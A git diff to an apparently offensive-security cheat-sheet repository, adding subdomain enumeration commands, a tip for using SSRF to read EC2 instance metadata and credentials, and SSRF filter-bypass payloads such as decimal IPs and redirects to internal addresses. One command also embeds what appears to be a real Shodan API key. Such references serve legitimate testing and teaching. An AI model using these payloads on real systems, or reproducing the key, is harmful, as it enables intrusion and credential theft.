diff --git a/AWS Amazon Bucket S3/README.md b/AWS Amazon Bucket S3/README.md index 36fcd210..ae26e508 100644 --- a/AWS Amazon Bucket S3/README.md +++ b/AWS Amazon Bucket S3/README.md @@ -48,3 +48,7 @@ List of the top Alexa 100,000 sites with permutations on the TLD and www. For ex * https://community.rapid7.com/community/infosec/blog/2013/03/27/1951-open-s3-buckets * https://digi.ninja/projects/bucket_finder.php * [Bug Bounty Survey - AWS Basic test](https://twitter.com/bugbsurveys/status/859389553211297792) + + + +This is one of my favorite tricks. More and more companies host part of their infrastructure on Amazon EC2. Amazon exposes an internal service every EC2 instance can query for instance metadata about the host. Here’s the AWS documentation. If you found an SSRF vulnerability that runs on EC2, try requesting http://169.254.169.254/latest/meta-data/. This will return a lot of useful information for you to understand the infrastructure and may reveal Amazon S3 access tokens, API tokens, and more. You may also want to download http://169.254.169.254/latest/user-data/ and unzip the data. diff --git a/Methodology_and_enumeration.md b/Methodology_and_enumeration.md index 9d553c8a..471f459f 100644 --- a/Methodology_and_enumeration.md +++ b/Methodology_and_enumeration.md @@ -44,6 +44,42 @@ git clone https://github.com/ChrisTruncer/EyeWitness.git ./EyeWitness -f rdp.txt --rdp ``` +* Using Sublist3r +```bash +To enumerate subdomains of specific domain and show the results in realtime: +python sublist3r.py -v -d example.com + +To enumerate subdomains and enable the bruteforce module: +python sublist3r.py -b -d example.com + +To enumerate subdomains and use specific engines such Google, Yahoo and Virustotal engines +python sublist3r.py -e google,yahoo,virustotal -d example.com + +python sublist3r.py -b -d example.com +``` + +* Using Aquatone +``` +gem install aquatone + +Discover subdomains : results in ~/aquatone/example.com/hosts.txt +aquatone-discover --domain example.com +aquatone-discover --domain example.com --threads 25 +aquatone-discover --domain example.com --sleep 5 --jitter 30 +aquatone-discover --set-key shodan o1hyw8pv59vSVjrZU3Qaz6ZQqgM91ihQ + +Active scans : results in ~/aquatone/example.com/urls.txt +aquatone-scan --domain example.com +aquatone-scan --domain example.com --ports 80,443,3000,8080 +aquatone-scan --domain example.com --ports large +aquatone-scan --domain example.com --threads 25 + +Final results +aquatone-gather --domain example.com +``` + + + ## Passive recon * Using Shodan (https://www.shodan.io/) to detect similar app @@ -186,20 +222,6 @@ More subdomain : gobuster -w wordlist -u URL -r -e ``` -* Using Sublist3r -```bash -To enumerate subdomains of specific domain and show the results in realtime: -python sublist3r.py -v -d example.com - -To enumerate subdomains and enable the bruteforce module: -python sublist3r.py -b -d example.com - -To enumerate subdomains and use specific engines such Google, Yahoo and Virustotal engines -python sublist3r.py -e google,yahoo,virustotal -d example.com - -python sublist3r.py -b -d example.com -``` - * Using a script to detect all phpinfo.php files in a range of IPs (CIDR can be found with a whois) ```bash #!/bin/bash diff --git a/SSRF injection/README.md b/SSRF injection/README.md index 843432ca..53a6fec4 100644 --- a/SSRF injection/README.md +++ b/SSRF injection/README.md @@ -1,5 +1,5 @@ -# Server-Side Request Forgery -Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on behalf of him. +# Server-Side Request Forgery +Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on behalf of him. ## Exploit @@ -17,6 +17,21 @@ http://localhost:443 http://localhost:22 ``` +Advanced exploit using a redirection +``` +1. Create a subdomain pointing to 192.168.0.1 with DNS A record e.g:ssrf.example.com +2. Launch the SSRF: vulnerable.com/index.php?url=http://YOUR_SERVER_IP +vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1 +``` + +Advanced exploit using type=url +``` +Change "type=file" to "type=url" +Paste URL in text field and hit enter +Using this vulnerability users can upload images from any image URL = trigger an SSRF +``` + +## Bypassing Bypass localhost with [::] ``` http://[::]:80/ @@ -30,9 +45,18 @@ Bypass localhost with a domain redirecting to locahost http://n-pn.info ``` --> 11211 +Bypass using a decimal ip location +``` +http://2130706433/ = http://127.0.0.1 +http://3232235521/ = http://192.168.0.1 +http://3232235777/ = http://192.168.1.1 +``` + +Bypass using malformed urls +``` localhost:+11211aaa localhost:00011211aaaa +``` ## Thanks to -* \ No newline at end of file +* [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF)